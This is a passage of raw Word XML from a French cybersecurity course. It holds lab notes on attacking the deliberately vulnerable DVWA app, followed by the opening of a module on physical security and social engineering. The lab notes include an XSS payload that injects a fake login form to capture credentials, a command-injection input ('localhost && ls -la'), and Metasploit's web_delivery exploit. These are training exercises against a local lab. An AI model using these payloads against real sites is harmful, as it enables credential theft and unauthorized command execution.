      </w:r>
    </w:p>
    <w:p w14:paraId="3A61D62E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="56628431" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1C7631B5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nous allons tenter d’injecter un formulaire dans cette page pour inciter l’utilisateur à saisir ses informations d’identification et de renvoyer le résultat sur une page d’erreur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5DA16D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">-&gt; Sur DVWA page XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Reflected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> entrez le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scrt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> suivant : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C06C70A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7B0E8898" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t>&lt;h3&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Authentication</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> serveur&lt;/h3&gt; &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> action=</w:t>
      </w:r>
      <w:hyperlink r:id="rId58">
        <w:r w:rsidR="00223B72">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://localhost</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>&gt;Nom d’utilisateur:&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;&lt;input type=&lt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=&lt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;&gt;&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;Mot de passe:&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;&lt;input type=”</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>….</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779B37BC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="238681B6" wp14:editId="7A2AEAAC">
            <wp:extent cx="5731200" cy="339090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731200" cy="3390900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B625B4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1ED12E5A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t>On voit les login mdp en haut</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EC02DE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="5B79B43B" wp14:editId="67041D10">
            <wp:extent cx="5731200" cy="22987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5731200" cy="2298700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E36E620" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2B272D8C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_fzjcjp579n5b" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w14:paraId="190B181F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_n8lvnolj1s63" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="103"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">Réalisation d’attaque par exécution de commande </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A922F2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="48AE74E8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_gu21sp602j0m" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="104"/>
      <w:r>
        <w:t xml:space="preserve">Attaque par exécution de commande simple </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C7BDB3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sur DVWA, cliquez sur commande injection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C55890" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>vas</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> lister les fichiers : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>locahost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &amp;&amp; ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E372AA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="23DBE2A7" wp14:editId="4592F377">
            <wp:extent cx="5731200" cy="2057400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7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a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="2057400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB2C265" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6DD85FF9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_6osj6qqzebsp" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="105"/>
      <w:r>
        <w:t xml:space="preserve">Attaque par </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>éxecution</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de commande en utilisant </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E6D802" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="52F984A4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Démarrer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et utiliser l’exploit multi/script/web-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>delivery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49625F18" w14:textId="77777777" w:rsidR="00223B72" w:rsidRPr="00BD3814" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3814">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use exploit/multi/script/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3814">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web_delivery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3814">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE6FB8D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014D3647" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0A280468" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="3C3DCF9E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_oamjbvi1iba5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="106"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">Scanner des application WEB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A52AA77" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="40627318" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">OWASP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE62DB9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6874C90D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Installer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6351F66D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3192EB0E" wp14:editId="6C505538">
            <wp:extent cx="5524500" cy="8001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524500" cy="800100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A67935B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="528CE924" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="02D8F72E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Tout mettre à jour </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588F3ECE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="60E23D14" wp14:editId="624E0C4B">
            <wp:extent cx="5731200" cy="1612900"/>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731200" cy="1612900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A694D4B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="04C6E24F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Automated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Scan </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE49CAE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="495BB0F4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="673A85E4" wp14:editId="4B2F6434">
            <wp:extent cx="5731200" cy="245110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731200" cy="2451100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA05023" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6A2F4433" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="3258518A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="013CDC06" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="16D19132" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="00BBFBCB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="46B74472" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7FC99341" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_seabid4wpwke" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="107"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Module 13 - Sécurité physique et sociale en cybersécurité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73231D65" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="990000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="252BA467" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="990000"/>
        </w:rPr>
        <w:t>Objectif du cours</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : protection des ressources physique et sensibilisation à l’ingénierie sociale (manipulation psycho des individus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164ECEE0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_oimrhxh7l5a5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="108"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">C’est quoi la sécurité physique ?  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6863177A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8894B0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La sécurité physique englobe toutes les mesures visant à protéger les personnes, les biens matériels et </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>les infra</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> d’une entreprise contre les risques d’intrusion, de vol, de vandalisme ou de sabotage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBCF6F5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125AF8BD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47051512" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cela inclut notamment la mise en place de dispositif de contrôle d’accès, de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>vidéosurveillance ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> d’alarmes et de dispositifs anti-incendie, ainsi que la formation personnel </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29062609" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>à la prévention des risques et la mise en place d’urgence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEE0095" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="249941C0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="267C32B3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Les conséquences d’un manque de sécu physique peuvent être dramatiques, tant sur le plan humain (accidents, agressions) que sur le plan économique (pertes financières atteintes à la répudiation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B1CF9A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="117600DE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="770C07C8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23937A45" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BC67138" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F26E7A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D84FEFD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4236DA05" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_sn6o27fkz2h0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="109"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">La Cybersécurité c’est quoi ? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D56CECD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16487846" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La cybersécurité concerne la protection des données des systèmes informatiques et des réseaux contre les cyberattaques, les intrusions, les vols d’infos et les actes de malveillance. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753ADB2F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF79E65" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F848080" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2942996D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_f7k3alx2knbk" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="110"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">Trouver un équilibre entre sécurité physique et cybersécurité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B04A5CA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il est évident que la sécurité physique et la cybersécurité sont deux aspects indissociables de la politique de sécu d’une E. Néanmoins les ressources étant souvent limitées, il est parfois nécessaire de faire des choix et de prioriser certaines actions en fonction des risques et des enjeux propres à chaque orga. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C592340" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02AA4B9C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A234ECD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_u3ez1m7yloek" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="111"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>Qu’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>est ce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve"> que l’ingénierie social </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1792F1FC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7B59FD0D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
